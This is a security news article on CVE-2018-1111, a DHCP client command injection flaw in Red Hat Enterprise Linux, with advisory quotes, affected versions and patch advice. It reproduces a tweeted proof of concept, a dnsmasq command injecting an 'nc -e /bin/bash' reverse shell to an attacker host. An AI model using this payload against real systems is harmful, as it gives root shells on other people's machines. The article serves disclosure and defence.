Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux, the issue also affects other distros based on it like Fedora.
The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://t.co/jFiOrUH6HG. Exploit fits in a tweet so you should patch as soon as possible.
— Felix Wilhelm (@_fel1x) May 15, 2018
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.
“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”
The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.
The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.
The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.
#CVE-2018-1111 tweetable PoC 🙂 dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC
— Barkın Kılıç (@Barknkilic) May 15, 2018
Wilhelm did not release a PoC exploit code, but he explained that is so short in length that it even can fit in a tweet.
According to Wilhelm, an attacker using a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running vulnerable DHCP client.
The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.
“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.
Below the full list of affected RHEL versions:
Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).
Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.
Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.
Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation doesn’t include NetworkManager integration script by default.
(Security Affairs – CVE-2018-1111, DHCP Client flaw)